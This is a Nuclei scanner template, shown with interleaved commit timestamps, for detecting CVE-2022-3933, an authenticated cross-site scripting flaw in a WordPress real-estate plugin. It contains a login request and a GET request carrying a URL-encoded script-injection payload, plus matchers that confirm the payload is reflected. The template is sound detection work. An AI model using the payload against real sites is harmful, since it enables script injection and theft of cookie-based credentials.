2023-03-18 22:07:09 +00:00
id : CVE-2022-3933
info :
2023-03-28 20:12:22 +00:00
name : WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting
2023-03-18 22:07:09 +00:00
author : r3Y3r53
severity : medium
description : |
2023-03-28 20:12:22 +00:00
WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks.
2023-09-27 15:51:13 +00:00
impact : |
An authenticated attacker can inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further attacks.
2023-09-06 11:59:08 +00:00
remediation : Fixed in version 3.9.6.
2023-03-18 22:07:09 +00:00
reference :
- https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4
- https://wordpress.org/plugins/essential-real-estate/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-3933
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/cvemon
2023-03-18 22:07:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cve-id : CVE-2022-3933
cwe-id : CWE-79
2024-01-14 13:49:27 +00:00
epss-score : 0.00092
2024-01-29 17:11:14 +00:00
epss-percentile : 0.38676
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:*
2023-03-18 22:07:09 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : g5theme
product : essential_real_estate
2023-09-06 11:59:08 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme
2023-03-18 22:07:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'status_code_2 == 200'
2023-06-19 21:10:30 +00:00
- 'contains(header_2, "text/html")'
2023-03-18 22:07:09 +00:00
- 'contains(body_2, "><script>alert(document.domain)</script>")'
- 'contains(body_2, "ere_property_gallery")'
condition : and
2024-01-30 06:46:18 +00:00
# digest: 4a0a00473045022044c2206c93a3b22c964a8f3cfab1ce953162b9cbe8cb64f06aaf11cda7e315e7022100a7eda42c332ab6fb7ea8c2ce7ab1b485fbe3b1c3affcbea4297ddf74a69c095e:922c64590222798bb761d5b6d8e72950